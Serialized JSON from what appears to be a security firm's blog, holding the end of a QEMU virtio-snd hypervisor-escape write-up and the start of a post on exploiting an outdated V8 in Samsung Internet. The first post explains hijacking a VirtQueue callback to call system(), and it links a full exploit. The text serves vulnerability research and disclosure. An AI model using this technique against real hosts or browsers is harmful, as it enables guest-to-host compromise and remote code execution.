14},{"style":6947},[135215],{"type":31,"value":17858},{"type":25,"tag":216,"props":135217,"children":135218},{"style":6953},[135219],{"type":31,"value":6956},{"type":25,"tag":216,"props":135221,"children":135222},{"style":6989},[135223],{"type":31,"value":6992},{"type":25,"tag":216,"props":135225,"children":135226},{"style":6964},[135227],{"type":31,"value":6967},{"type":25,"tag":216,"props":135229,"children":135230},{"class":6922,"line":27606},[135231,135235,135239,135243,135247,135251,135255],{"type":25,"tag":216,"props":135232,"children":135233},{"style":7047},[135234],{"type":31,"value":128239},{"type":25,"tag":216,"props":135236,"children":135237},{"style":6964},[135238],{"type":31,"value":1850},{"type":25,"tag":216,"props":135240,"children":135241},{"style":6953},[135242],{"type":31,"value":7059},{"type":25,"tag":216,"props":135244,"children":135245},{"style":6947},[135246],{"type":31,"value":40224},{"type":25,"tag":216,"props":135248,"children":135249},{"style":6964},[135250],{"type":31,"value":17714},{"type":25,"tag":216,"props":135252,"children":135253},{"style":6947},[135254],{"type":31,"value":128260},{"type":25,"tag":216,"props":135256,"children":135257},{"style":6964},[135258],{"type":31,"value":135259},", buffer, entry);\n",{"type":25,"tag":216,"props":135261,"children":135262},{"class":6922,"line":27615},[135263],{"type":25,"tag":216,"props":135264,"children":135265},{"style":6964},[135266],{"type":31,"value":7302},{"type":25,"tag":38,"props":135268,"children":135269},{},[135270,135271,135276,135278,135283,135285,135290,135292,135298],{"type":31,"value":128314},{"type":25,"tag":82,"props":135272,"children":135274},{"className":135273},[],[135275],{"type":31,"value":128320},{"type":31,"value":135277},", QEMU allocates a ",{"type":25,"tag":82,"props":135279,"children":135281},{"className":135280},[],[135282],{"type":31,"value":128457},{"type":31,"value":135284}," whose size depends on the guest-provided iovec, and at ",{"type":25,"tag":82,"props":135286,"children":135288},{"className":135287},[],[135289],{"type":31,"value":128355},{"type":31,"value":135291}," it stores the ",{"type":25,"tag":82,"props":135293,"children":135295},{"className":135294},[],[135296],{"type":31,"value":135297},"VirtQueue *vq",{"type":31,"value":135299}," pointer into the buffer.",{"type":25,"tag":38,"props":135301,"children":135302},{},[135303,135304,135310],{"type":31,"value":68185},{"type":25,"tag":82,"props":135305,"children":135307},{"className":135306},[],[135308],{"type":31,"value":135309},"VirtQueue",{"type":31,"value":135311}," structure contains some useful fields:",{"type":25,"tag":206,"props":135313,"children":135315},{"code":135314,"language":2254,"meta":7,"className":20473,"style":7},"struct VirtQueue\n{\n    [...]\n\n    VirtIOHandleOutput handle_output;\n    VirtIODevice *vdev;\n\n    [...]\n};\n",[135316],{"type":25,"tag":82,"props":135317,"children":135318},{"__ignoreMap":7},[135319,135331,135338,135345,135352,135360,135377,135384,135391],{"type":25,"tag":216,"props":135320,"children":135321},{"class":6922,"line":6923},[135322,135326],{"type":25,"tag":216,"props":135323,"children":135324},{"style":6936},[135325],{"type":31,"value":13357},{"type":25,"tag":216,"props":135327,"children":135328},{"style":6964},[135329],{"type":31,"value":135330}," VirtQueue\n",{"type":25,"tag":216,"props":135332,"children":135333},{"class":6922,"line":6769},[135334],{"type":25,"tag":216,"props":135335,"children":135336},{"style":6964},[135337],{"type":31,"value":14836},{"type":25,"tag":216,"props":135339,"children":135340},{"class":6922,"line":6778},[135341],{"type":25,"tag":216,"props":135342,"children":135343},{"style":6964},[135344],{"type":31,"value":108759},{"type":25,"tag":216,"props":135346,"children":135347},{"class":6922,"line":7005},[135348],{"type":25,"tag":216,"props":135349,"children":135350},{"emptyLinePlaceholder":16},[135351],{"type":31,"value":7642},{"type":25,"tag":216,"props":135353,"children":135354},{"class":6922,"line":7110},[135355],{"type":25,"tag":216,"props":135356,"children":135357},{"style":6964},[135358],{"type":31,"value":135359},"    VirtIOHandleOutput handle_output;\n",{"type":25,"tag":216,"props":135361,"children":135362},{"class":6922,"line":7216},[135363,135368,135372],{"type":25,"tag":216,"props":135364,"children":135365},{"style":6964},[135366],{"type":31,"value":135367},"    VirtIODevice ",{"type":25,"tag":216,"props":135369,"children":135370},{"style":6953},[135371],{"type":31,"value":8519},{"type":25,"tag":216,"props":135373,"children":135374},{"style":6964},[135375],{"type":31,"value":135376},"vdev;\n",{"type":25,"tag":216,"props":135378,"children":135379},{"class":6922,"line":7244},[135380],{"type":25,"tag":216,"props":135381,"children":135382},{"emptyLinePlaceholder":16},[135383],{"type":31,"value":7642},{"type":25,"tag":216,"props":135385,"children":135386},{"class":6922,"line":7257},[135387],{"type":25,"tag":216,"props":135388,"children":135389},{"style":6964},[135390],{"type":31,"value":108759},{"type":25,"tag":216,"props":135392,"children":135393},{"class":6922,"line":7275},[135394],{"type":25,"tag":216,"props":135395,"children":135396},{"style":6964},[135397],{"type":31,"value":20536},{"type":25,"tag":38,"props":135399,"children":135400},{},[135401,135402,135408,135410,135416],{"type":31,"value":474},{"type":25,"tag":82,"props":135403,"children":135405},{"className":135404},[],[135406],{"type":31,"value":135407},".handle_output",{"type":31,"value":135409}," field is a callback, specifically a function pointer that gets called when the virtqueue receives a notification from the guest, and ",{"type":25,"tag":82,"props":135411,"children":135413},{"className":135412},[],[135414],{"type":31,"value":135415},".vdev",{"type":31,"value":135417}," is the pointer passed to it as the first argument:",{"type":25,"tag":206,"props":135419,"children":135421},{"code":135420,"language":2254,"meta":7,"className":20473,"style":7},"static void virtio_queue_notify_vq(VirtQueue *vq)\n{\n    if (vq->vring.desc && vq->handle_output) {\n        VirtIODevice *vdev = vq->vdev;\n\n        [...]\n\n        vq->handle_output(vdev, vq);\n\n        [...]\n    }\n}\n",[135422],{"type":25,"tag":82,"props":135423,"children":135424},{"__ignoreMap":7},[135425,135458,135465,135520,135557,135564,135571,135578,135599,135606,135613,135620],{"type":25,"tag":216,"props":135426,"children":135427},{"class":6922,"line":6923},[135428,135432,135436,135441,135446,135450,135454],{"type":25,"tag":216,"props":135429,"children":135430},{"style":6936},[135431],{"type":31,"value":55013},{"type":25,"tag":216,"props":135433,"children":135434},{"style":6936},[135435],{"type":31,"value":55018},{"type":25,"tag":216,"props":135437,"children":135438},{"style":7047},[135439],{"type":31,"value":135440}," virtio_queue_notify_vq",{"type":25,"tag":216,"props":135442,"children":135443},{"style":6964},[135444],{"type":31,"value":135445},"(VirtQueue ",{"type":25,"tag":216,"props":135447,"children":135448},{"style":6953},[135449],{"type":31,"value":8519},{"type":25,"tag":216,"props":135451,"children":135452},{"style":6947},[135453],{"type":31,"value":127804},{"type":25,"tag":216,"props":135455,"children":135456},{"style":6964},[135457],{"type":31,"value":7107},{"type":25,"tag":216,"props":135459,"children":135460},{"class":6922,"line":6769},[135461],{"type":25,"tag":216,"props":135462,"children":135463},{"style":6964},[135464],{"type":31,"value":14836},{"type":25,"tag":216,"props":135466,"children":135467},{"class":6922,"line":6778},[135468,135472,135476,135480,135484,135489,135493,135498,135502,135507,135511,135516],{"type":25,"tag":216,"props":135469,"children":135470},{"style":6973},[135471],{"type":31,"value":16235},{"type":25,"tag":216,"props":135473,"children":135474},{"style":6964},[135475],{"type":31,"value":7016},{"type":25,"tag":216,"props":135477,"children":135478},{"style":6947},[135479],{"type":31,"value":127804},{"type":25,"tag":216,"props":135481,"children":135482},{"style":6964},[135483],{"type":31,"value":17714},{"type":25,"tag":216,"props":135485,"children":135486},{"style":6947},[135487],{"type":31,"value":135488},"vring",{"type":25,"tag":216,"props":135490,"children":135491},{"style":6964},[135492],{"type":31,"value":179},{"type":25,"tag":216,"props":135494,"children":135495},{"style":6947},[135496],{"type":31,"value":135497},"desc",{"type":25,"tag":216,"props":135499,"children":135500},{"style":6953},[135501],{"type":31,"value":18142},{"type":25,"tag":216,"props":135503,"children":135504},{"style":6947},[135505],{"type":31,"value":135506}," vq",{"type":25,"tag":216,"props":135508,"children":135509},{"style":6964},[135510],{"type":31,"value":17714},{"type":25,"tag":216,"props":135512,"children":135513},{"style":6947},[135514],{"type":31,"value":135515},"handle_output",{"type":25,"tag":216,"props":135517,"children":135518},{"style":6964},[135519],{"type":31,"value":18761},{"type":25,"tag":216,"props":135521,"children":135522},{"class":6922,"line":7005},[135523,135528,135532,135537,135541,135545,135549,135553],{"type":25,"tag":216,"props":135524,"children":135525},{"style":6964},[135526],{"type":31,"value":135527},"        VirtIODevice ",{"type":25,"tag":216,"props":135529,"children":135530},{"style":6953},[135531],{"type":31,"value":8519},{"type":25,"tag":216,"props":135533,"children":135534},{"style":6964},[135535],{"type":31,"value":135536},"vdev ",{"type":25,"tag":216,"props":135538,"children":135539},{"style":6953},[135540],{"type":31,"value":266},{"type":25,"tag":216,"props":135542,"children":135543},{"style":6947},[135544],{"type":31,"value":135506},{"type":25,"tag":216,"props":135546,"children":135547},{"style":6964},[135548],{"type":31,"value":17714},{"type":25,"tag":216,"props":135550,"children":135551},{"style":6947},[135552],{"type":31,"value":127790},{"type":25,"tag":216,"props":135554,"children":135555},{"style":6964},[135556],{"type":31,"value":6967},{"type":25,"tag":216,"props":135558,"children":135559},{"class":6922,"line":7110},[135560],{"type":25,"tag":216,"props":135561,"children":135562},{"emptyLinePlaceholder":16},[135563],{"type":31,"value":7642},{"type":25,"tag":216,"props":135565,"children":135566},{"class":6922,"line":7216},[135567],{"type":25,"tag":216,"props":135568,"children":135569},{"style":6964},[135570],{"type":31,"value":127971},{"type":25,"tag":216,"props":135572,"children":135573},{"class":6922,"line":7244},[135574],{"type":25,"tag":216,"props":135575,"children":135576},{"emptyLinePlaceholder":16},[135577],{"type":31,"value":7642},{"type":25,"tag":216,"props":135579,"children":135580},{"class":6922,"line":7257},[135581,135586,135590,135594],{"type":25,"tag":216,"props":135582,"children":135583},{"style":6947},[135584],{"type":31,"value":135585},"        vq",{"type":25,"tag":216,"props":135587,"children":135588},{"style":6964},[135589],{"type":31,"value":17714},{"type":25,"tag":216,"props":135591,"children":135592},{"style":7047},[135593],{"type":31,"value":135515},{"type":25,"tag":216,"props":135595,"children":135596},{"style":6964},[135597],{"type":31,"value":135598},"(vdev, vq);\n",{"type":25,"tag":216,"props":135600,"children":135601},{"class":6922,"line":7275},[135602],{"type":25,"tag":216,"props":135603,"children":135604},{"emptyLinePlaceholder":16},[135605],{"type":31,"value":7642},{"type":25,"tag":216,"props":135607,"children":135608},{"class":6922,"line":7296},[135609],{"type":25,"tag":216,"props":135610,"children":135611},{"style":6964},[135612],{"type":31,"value":127971},{"type":25,"tag":216,"props":135614,"children":135615},{"class":6922,"line":7305},[135616],{"type":25,"tag":216,"props":135617,"children":135618},{"style":6964},[135619],{"type":31,"value":7311},{"type":25,"tag":216,"props":135621,"children":135622},{"class":6922,"line":7557},[135623],{"type":25,"tag":216,"props":135624,"children":135625},{"style":6964},[135626],{"type":31,"value":7874},{"type":25,"tag":38,"props":135628,"children":135629},{},[135630,135632,135637,135639,135644,135646,135652,135654,135659,135660,135665,135667,135672],{"type":31,"value":135631},"This means that if we free the known-address chunk and replace it with a ",{"type":25,"tag":82,"props":135633,"children":135635},{"className":135634},[],[135636],{"type":31,"value":128457},{"type":31,"value":135638}," - which is straightforward, since we control the buffer allocation size through the ",{"type":25,"tag":82,"props":135640,"children":135642},{"className":135641},[],[135643],{"type":31,"value":128045},{"type":31,"value":135645}," iovec - we can use the arbitrary read primitive to read its ",{"type":25,"tag":82,"props":135647,"children":135649},{"className":135648},[],[135650],{"type":31,"value":135651},".vq",{"type":31,"value":135653}," pointer, then follow that pointer to leak ",{"type":25,"tag":82,"props":135655,"children":135657},{"className":135656},[],[135658],{"type":31,"value":135407},{"type":31,"value":20011},{"type":25,"tag":82,"props":135661,"children":135663},{"className":135662},[],[135664],{"type":31,"value":135309},{"type":31,"value":135666}," structure. In our case, that field points to ",{"type":25,"tag":82,"props":135668,"children":135670},{"className":135669},[],[135671],{"type":31,"value":127697},{"type":31,"value":135673},", which gives us QEMU's base address.",{"type":25,"tag":38,"props":135675,"children":135676},{},[135677,135679,135685],{"type":31,"value":135678},"From there, we can use the arbitrary read primitive once more to read a resolved entry from QEMU's GOT, leaking a libc address. With that, we can compute the address of ",{"type":25,"tag":82,"props":135680,"children":135682},{"className":135681},[],[135683],{"type":31,"value":135684},"system",{"type":31,"value":179},{"type":25,"tag":606,"props":135687,"children":135689},{"id":135688},"rip-control",[135690],{"type":31,"value":135691},"RIP Control",{"type":25,"tag":38,"props":135693,"children":135694},{},[135695,135697,135702,135704,135710],{"type":31,"value":135696},"At this point, we have everything we need: an arbitrary read/write primitive, a QEMU code leak, and the address of ",{"type":25,"tag":82,"props":135698,"children":135700},{"className":135699},[],[135701],{"type":31,"value":135684},{"type":31,"value":135703},". To hijack control flow, we do not need to look far - we just described a function pointer on the heap at a known address: ",{"type":25,"tag":82,"props":135705,"children":135707},{"className":135706},[],[135708],{"type":31,"value":135709},"VirtQueue.handle_output",{"type":31,"value":179},{"type":25,"tag":38,"props":135712,"children":135713},{},[135714,135716,135721,135723,135728,135730,135735],{"type":31,"value":135715},"We overwrite ",{"type":25,"tag":82,"props":135717,"children":135719},{"className":135718},[],[135720],{"type":31,"value":135407},{"type":31,"value":135722}," with the address of ",{"type":25,"tag":82,"props":135724,"children":135726},{"className":135725},[],[135727],{"type":31,"value":135684},{"type":31,"value":135729}," and write the command string we want to execute into memory using our arbitrary write. Then we overwrite ",{"type":25,"tag":82,"props":135731,"children":135733},{"className":135732},[],[135734],{"type":31,"value":135415},{"type":31,"value":135736}," with the address of that command string, so it is passed as the first argument.",{"type":25,"tag":38,"props":135738,"children":135739},{},[135740,135742,135748,135750,135756,135758,135764],{"type":31,"value":135741},"Then, we simply notify the virtqueue from the guest. QEMU enters ",{"type":25,"tag":82,"props":135743,"children":135745},{"className":135744},[],[135746],{"type":31,"value":135747},"virtio_queue_notify_vq",{"type":31,"value":135749},", which calls ",{"type":25,"tag":82,"props":135751,"children":135753},{"className":135752},[],[135754],{"type":31,"value":135755},"vq->handle_output(vq->vdev)",{"type":31,"value":135757}," - or, after our overwrites, ",{"type":25,"tag":82,"props":135759,"children":135761},{"className":135760},[],[135762],{"type":31,"value":135763},"system(command)",{"type":31,"value":179},{"type":25,"tag":38,"props":135766,"children":135767},{},[135768,135770,135776,135778],{"type":31,"value":135769},"Finally, with all of this, we achieve a reliable guest-to-host escape and execute ",{"type":25,"tag":82,"props":135771,"children":135773},{"className":135772},[],[135774],{"type":31,"value":135775},"gnome-calculator",{"type":31,"value":135777}," on the host system:\n",{"type":25,"tag":34930,"props":135779,"children":135780},{},[],{"type":25,"tag":135782,"props":135783,"children":135792},"tweet-card",{"author-name":135784,"date":135785,"duration":135786,"handle":135787,"media-mime-type":135788,"media-src":135789,"media-type":135790,"tweet-url":135791},"OtterSec","March 5, 2026","0:12","@osec_io","video/mp4","/posts/virtio-snd-qemu-0day/demo.mp4","video","https://x.com/osec_io/status/2029643325125390550",[135793,135798,135803],{"type":25,"tag":38,"props":135794,"children":135795},{},[135796],{"type":31,"value":135797},"We recently achieved guest-to-host escape by exploiting a QEMU 0day.",{"type":25,"tag":38,"props":135799,"children":135800},{},[135801],{"type":31,"value":135802},"We’ll share details on a new technique leveraging the latest glibc allocator behavior and what we believe is a novel QEMU-specific heap spray/RIP-control primitive.",{"type":25,"tag":38,"props":135804,"children":135805},{},[135806],{"type":31,"value":135807},"Writeup coming next week.",{"type":25,"tag":34930,"props":135809,"children":135810},{},[],{"type":25,"tag":38,"props":135812,"children":135813},{},[135814,135816,135822,135824,135830],{"type":31,"value":135815},"The final exploit, targeting QEMU commit ",{"type":25,"tag":82,"props":135817,"children":135819},{"className":135818},[],[135820],{"type":31,"value":135821},"ece408818d27f745ef1b05fb3cc99a1e7a5bf580",{"type":31,"value":135823}," (Feb 13, 2026) and the latest glibc 2.43, can be found ",{"type":25,"tag":162,"props":135825,"children":135828},{"href":135826,"rel":135827},"https://github.com/otter-sec/qemu-escape",[166],[135829],{"type":31,"value":51553},{"type":31,"value":179},{"type":25,"tag":38,"props":135832,"children":135833},{},[135834,135836,135843],{"type":31,"value":135835},"Special thanks to ",{"type":25,"tag":162,"props":135837,"children":135840},{"href":135838,"rel":135839},"https://www.willsroot.io/",[166],[135841],{"type":31,"value":135842},"William Liu",{"type":31,"value":135844}," for proofreading this post and helping us polish it before publication.",{"type":25,"tag":26,"props":135846,"children":135847},{"id":32892},[135848],{"type":31,"value":22907},{"type":25,"tag":38,"props":135850,"children":135851},{},[135852],{"type":31,"value":135853},"Starting from a heap overflow where the written bytes are effectively random, we showed how careful heap grooming and a favorable change in glibc 2.43's allocator can turn even a single byte of uncontrolled corruption into a reliable guest-to-host escape.",{"type":25,"tag":38,"props":135855,"children":135856},{},[135857],{"type":31,"value":135858},"More broadly, this exploit is a reminder that weak-looking primitives should not be dismissed too quickly - with the right heap layout and target, even highly constrained corruption can be enough.",{"type":25,"tag":9316,"props":135860,"children":135861},{},[135862],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":135864},[135865,135868,135871,135880],{"id":127593,"depth":6769,"text":127606,"children":135866},[135867],{"id":127614,"depth":6778,"text":127617},{"id":127638,"depth":6769,"text":127641,"children":135869},[135870],{"id":127652,"depth":6778,"text":127652},{"id":104066,"depth":6769,"text":104069,"children":135872},[135873,135874,135875,135876,135877,135878,135879],{"id":130244,"depth":6778,"text":130247},{"id":131771,"depth":6778,"text":131774},{"id":132565,"depth":6778,"text":132568},{"id":132970,"depth":6778,"text":132973},{"id":133186,"depth":6778,"text":133189},{"id":133392,"depth":6778,"text":133395},{"id":135688,"depth":6778,"text":135691},{"id":32892,"depth":6769,"text":22907},"content:blog:2026-03-17-virtio-snd-qemu-hypervisor-escape.md","blog/2026-03-17-virtio-snd-qemu-hypervisor-escape.md","blog/2026-03-17-virtio-snd-qemu-hypervisor-escape",{"_path":135885,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":135886,"description":135887,"date":135888,"author":135889,"image":135892,"isFeatured":16,"onBlogPage":16,"tags":135894,"body":135897,"_type":6798,"_id":145804,"_source":6800,"_file":145805,"_stem":145806,"_extension":6803},"/blog/2026-04-01-patch-gap-to-mobile-renderer-rce","Patch Gap to Mobile Renderer RCE: Pwning Samsung Internet's V8 on the Galaxy S25","Samsung Internet on the Galaxy S25 shipped a six-month-old version of V8, exposing it to publicly known bugs. Learn how we exploited a bytecode interpreter vulnerability to achieve renderer RCE and universal XSS in the browser.","2026-04-01T12:00:00.000Z",[127589,135890,135891],"jamie","william",{"src":135893,"width":101226,"height":17580},"/posts/mobile-renderer-rce/title.png",[135895,135896],"RCE","mobile",{"type":22,"children":135898,"toc":145784},[135899,135903,135908,135922,135928,135942,135963,135971,135984,135992,136005,136011,136024,136038,136044,136058,136161,136166,136174,136179,136184,136205,136283,136291,136310,136323,136329,136335,136349,136465,136470,136475,136483,136488,136496,136524,136553,136565,136741,136746,136754,136773,136786,136792,136812,136826,136831,136836,136864,136900,136969,136975,136997,137002,137010,137023,137028,137036,137041,137080,137086,137099,137104,137282,137292,137300,137320,137344,137357,137363,137368,138010,138015,138023,138065,140053,140058,140066,140072,140105,140123,140293,140351,140376,140470,140475,141266,141271,141279,141290,143334,143339,143347,143353,143375,143389,143402,143414,143444,143449,143890,143918,144025,144042,144199,144204,144216,144512,144538,144561,144693,144705,144710,144862,144898,144911,144916,145038,145079,145156,145161,145735,145741,145753,145766,145770,145775,145780],{"type":25,"tag":26,"props":135900,"children":135901},{"id":32975},[135902],{"type":31,"value":32978},{"type":25,"tag":38,"props":135904,"children":135905},{},[135906],{"type":31,"value":135907},"The supply chain dependency in today's software landscape is extremely complex. Any vulnerability in a core library creates an exploitable window for its dependents - maintainers either fall behind on the exhausting update schedule, backport incorrectly, or even forget about it entirely.",{"type":25,"tag":38,"props":135909,"children":135910},{},[135911,135913,135920],{"type":31,"value":135912},"One such example is V8, a JavaScript engine used ubiquitously in Chromium and Node.js-based software. In collaboration with the ",{"type":25,"tag":162,"props":135914,"children":135917},{"href":135915,"rel":135916},"https://cor.team",[166],[135918],{"type":31,"value":135919},"Crusaders of Rust",{"type":31,"value":135921}," Security Research Group, we decided to analyze the version of V8 in Samsung Internet (the default browser on Samsung phones) on a Samsung Galaxy S25 in hopes of an n-day exploitation opportunity.",{"type":25,"tag":606,"props":135923,"children":135925},{"id":135924},"finding-the-v8-version",[135926],{"type":31,"value":135927},"Finding the V8 Version",{"type":25,"tag":38,"props":135929,"children":135930},{},[135931,135933,135940],{"type":31,"value":135932},"We started by pulling Samsung Internet's APK from the device over ",{"type":25,"tag":162,"props":135934,"children":135937},{"href":135935,"rel":135936},"https://developer.android.com/tools/adb",[166],[135938],{"type":31,"value":135939},"adb",{"type":31,"value":135941}," and inspecting the libraries it shipped with.",{"type":25,"tag":38,"props":135943,"children":135944},{},[135945,135947,135953,135955,135961],{"type":31,"value":135946},"After extracting the APK, we searched the ",{"type":25,"tag":82,"props":135948,"children":135950},{"className":135949},[],[135951],{"type":31,"value":135952},"lib/",{"type":31,"value":135954}," directory for ",{"type":25,"tag":82,"props":135956,"children":135958},{"className":135957},[],[135959],{"type":31,"value":135960},"v8::*",{"type":31,"value":135962}," symbols:",{"type":25,"tag":206,"props":135964,"children":135966},{"code":135965},"$ grep -r 'v8::' lib/\ngrep: lib/arm64-v8a/libterrace.so: binary file matches\n",[135967],{"type":25,"tag":82,"props":135968,"children":135969},{"__ignoreMap":7},[135970],{"type":31,"value":135965},{"type":25,"tag":38,"props":135972,"children":135973},{},[135974,135976,135982],{"type":31,"value":135975},"Only one file matched our search: ",{"type":25,"tag":82,"props":135977,"children":135979},{"className":135978},[],[135980],{"type":31,"value":135981},"libterrace.so",{"type":31,"value":135983},". We then loaded it into a decompiler to inspect it more closely, which is where we found the bundled V8 version:",{"type":25,"tag":38,"props":135985,"children":135986},{},[135987],{"type":25,"tag":6467,"props":135988,"children":135991},{"alt":135989,"src":135990},"image1","/posts/mobile-renderer-rce/image1.png",[],{"type":25,"tag":38,"props":135993,"children":135994},{},[135995,135997,136003],{"type":31,"value":135996},"Surprisingly, this ",{"type":25,"tag":82,"props":135998,"children":136000},{"className":135999},[],[136001],{"type":31,"value":136002},"13.6.233.10",{"type":31,"value":136004}," version was already six months old at the time, with multiple publicly known bugs affecting it.",{"type":25,"tag":606,"props":136006,"children":136008},{"id":136007},"choosing-the-bug",[136009],{"type":31,"value":136010},"Choosing the Bug",{"type":25,"tag":38,"props":136012,"children":136013},{},[136014,136016,136022],{"type":31,"value":136015},"We were able to trigger a couple of bugs on our locally compiled ",{"type":25,"tag":82,"props":136017,"children":136019},{"className":136018},[],[136020],{"type":31,"value":136021},"d8",{"type":31,"value":136023}," matching the target version. One of them was CVE-2025-5419 - a store-store elimination bug that we managed to get working on the device. However, exploitation required heap spraying, which would present significant stability issues when porting to the phone.",{"type":25,"tag":38,"props":136025,"children":136026},{},[136027,136029,136036],{"type":31,"value":136028},"Another one was ",{"type":25,"tag":162,"props":136030,"children":136033},{"href":136031,"rel":136032},"https://issuetracker.google.com/issues/443875388",[166],[136034],{"type":31,"value":136035},"CVE-2025-10891",{"type":31,"value":136037}," - a bug in the Ignition bytecode interpreter. This one was attractive as bytecode is treated as trusted under the V8 sandbox model, meaning that a separate Übercage bypass would not be required. Given this, we decided to explore this bug further.",{"type":25,"tag":26,"props":136039,"children":136041},{"id":136040},"ignition-bytecode-introduction",[136042],{"type":31,"value":136043},"Ignition Bytecode Introduction",{"type":25,"tag":38,"props":136045,"children":136046},{},[136047,136049,136056],{"type":31,"value":136048},"V8 initially compiles all JS code to a bytecode format with the ",{"type":25,"tag":162,"props":136050,"children":136053},{"href":136051,"rel":136052},"https://v8.dev/blog/ignition-interpreter",[166],[136054],{"type":31,"value":136055},"Ignition",{"type":31,"value":136057}," interpreter.\nThis is a simple register-based VM with fixed size opcodes (and prefix bytes to increase operand width). For instance:",{"type":25,"tag":206,"props":136059,"children":136061},{"code":136060,"language":35327,"meta":7,"className":35325,"style":7},"let a = 1;\nlet b = 0x0fff;\nlet c = 0x0fffffff;\nlet d = 0xffffffff;\n",[136062],{"type":25,"tag":82,"props":136063,"children":136064},{"__ignoreMap":7},[136065,136088,136112,136136],{"type":25,"tag":216,"props":136066,"children":136067},{"class":6922,"line":6923},[136068,136072,136076,136080,136084],{"type":25,"tag":216,"props":136069,"children":136070},{"style":6936},[136071],{"type":31,"value":15743},{"type":25,"tag":216,"props":136073,"children":136074},{"style":6947},[136075],{"type":31,"value":93807},{"type":25,"tag":216,"props":136077,"children":136078},{"style":6953},[136079],{"type":31,"value":6956},{"type":25,"tag":216,"props":136081,"children":136082},{"style":6989},[136083],{"type":31,"value":8471},{"type":25,"tag":216,"props":136085,"children":136086},{"style":6964},[136087],{"type":31,"value":6967},{"type":25,"tag":216,"props":136089,"children":136090},{"class":6922,"line":6769},[136091,136095,136099,136103,136108],{"type":25,"tag":216,"props":136092,"children":136093},{"style":6936},[136094],{"type":31,"value":15743},{"type":25,"tag":216,"props":136096,"children":136097},{"style":6947},[136098],{"type":31,"value":94681},{"type":25,"tag":216,"props":136100,"children":136101},{"style":6953},[136102],{"type":31,"value":6956},{"type":25,"tag":216,"props":136104,"children":136105},{"style":6989},[136106],{"type":31,"value":136107}," 0x0fff",{"type":25,"tag":216,"props":136109,"children":136110},{"style":6964},[136111],{"type":31,"value":6967},{"type":25,"tag":216,"props":136113,"children":136114},{"class":6922,"line":6778},[136115,136119,136123,136127,136132],{"type":25,"tag":216,"props":136116,"children":136117},{"style":6936},[136118],{"type":31,"value":15743},{"type":25,"tag":216,"props":136120,"children":136121},{"style":6947},[136122],{"type":31,"value":41408},{"type":25,"tag":216,"props":136124,"children":136125},{"style":6953},[136126],{"type":31,"value":6956},{"type":25,"tag":216,"props":136128,"children":136129},{"style":6989},[136130],{"type":31,"value":136131}," 0x0fffffff",{"type":25,"tag":216,"props":136133,"children":136134},{"style":6964},[136135],{"type":31,"value":6967},{"type":25,"tag":216,"props":136137,"children":136138},{"class":6922,"line":7005},[136139,136143,136148,136152,136157],{"type":25,"tag":216,"props":136140,"children":136141},{"style":6936},[136142],{"type":31,"value":15743},{"type":25,"tag":216,"props":136144,"children":136145},{"style":6947},[136146],{"type":31,"value":136147}," d",{"type":25,"tag":216,"props":136149,"children":136150},{"style":6953},[136151],{"type":31,"value":6956},{"type":25,"tag":216,"props":136153,"children":136154},{"style":6989},[136155],{"type":31,"value":136156}," 0xffffffff",{"type":25,"tag":216,"props":136158,"children":136159},{"style":6964},[136160],{"type":31,"value":6967},{"type":25,"tag":38,"props":136162,"children":136163},{},[136164],{"type":31,"value":136165},"compiles to",{"type":25,"tag":206,"props":136167,"children":136169},{"code":136168}," # Load the Smi `1` into the accumulator\n 0 : 0d 01             LdaSmi [1]\n # Store it to register 0\n 2 : ce                Star0\n # Load the 2-byte Smi `0xfff` into acc\n 3 : 00 0d ff 0f       LdaSmi.Wide [4095]\n # Store it to register 1\n 7 : cd                Star1\n # Load the 4-byte Smi `0xfffffff` into acc\n 8 : 01 0d ff ff ff 0f LdaSmi.ExtraWide [268435455]\n # Store it to register 2\n14 : cc                Star2\n# `0xffffffff` doesn't fit into an Smi, so a `HeapNumber` is allocated in the function's constant pool and loaded\n15 : 13 00             LdaConstant [0]\n# Store it to register 3\n17 : cb                Star3\n18 : 0e                LdaUndefined\n19 : b3                Return\n",[136170],{"type":25,"tag":82,"props":136171,"children":136172},{"__ignoreMap":7},[136173],{"type":31,"value":136168},{"type":25,"tag":38,"props":136175,"children":136176},{},[136177],{"type":31,"value":136178},"Ignition bytecode is then passed through the Sparkplug, Maglev, and Turbofan JIT compilers depending on the required amount of optimization. Yes, V8 has FOUR compilers, all so that slop devs can continue \"engineering\" their RAM-hungry, CPU-draining web apps that have plagued the modern internet.",{"type":25,"tag":606,"props":136180,"children":136182},{"id":136181},"cve-2025-10891",[136183],{"type":31,"value":136035},{"type":25,"tag":38,"props":136185,"children":136186},{},[136187,136189,136195,136197,136203],{"type":31,"value":136188},"The bug is in the handling of try/catch blocks. These are encoded in a function as a list of ",{"type":25,"tag":82,"props":136190,"children":136192},{"className":136191},[],[136193],{"type":31,"value":136194},"[start, end) => handler",{"type":31,"value":136196}," offsets - if an exception is thrown in the given bytecode address range, ",{"type":25,"tag":82,"props":136198,"children":136200},{"className":136199},[],[136201],{"type":31,"value":136202},"handler",{"type":31,"value":136204}," is jumped to.",{"type":25,"tag":206,"props":136206,"children":136208},{"code":136207,"language":35327,"meta":7,"className":35325,"style":7},"try {\n  throw 1;\n} catch {\n  let b = 2;\n}\n",[136209],{"type":25,"tag":82,"props":136210,"children":136211},{"__ignoreMap":7},[136212,136223,136238,136253,136276],{"type":25,"tag":216,"props":136213,"children":136214},{"class":6922,"line":6923},[136215,136219],{"type":25,"tag":216,"props":136216,"children":136217},{"style":6973},[136218],{"type":31,"value":52300},{"type":25,"tag":216,"props":136220,"children":136221},{"style":6964},[136222],{"type":31,"value":7241},{"type":25,"tag":216,"props":136224,"children":136225},{"class":6922,"line":6769},[136226,136230,136234],{"type":25,"tag":216,"props":136227,"children":136228},{"style":6973},[136229],{"type":31,"value":39165},{"type":25,"tag":216,"props":136231,"children":136232},{"style":6989},[136233],{"type":31,"value":8471},{"type":25,"tag":216,"props":136235,"children":136236},{"style":6964},[136237],{"type":31,"value":6967},{"type":25,"tag":216,"props":136239,"children":136240},{"class":6922,"line":6778},[136241,136245,136249],{"type":25,"tag":216,"props":136242,"children":136243},{"style":6964},[136244],{"type":31,"value":50842},{"type":25,"tag":216,"props":136246,"children":136247},{"style":6973},[136248],{"type":31,"value":52380},{"type":25,"tag":216,"props":136250,"children":136251},{"style":6964},[136252],{"type":31,"value":7241},{"type":25,"tag":216,"props":136254,"children":136255},{"class":6922,"line":7005},[136256,136260,136264,136268,136272],{"type":25,"tag":216,"props":136257,"children":136258},{"style":6936},[136259],{"type":31,"value":11807},{"type":25,"tag":216,"props":136261,"children":1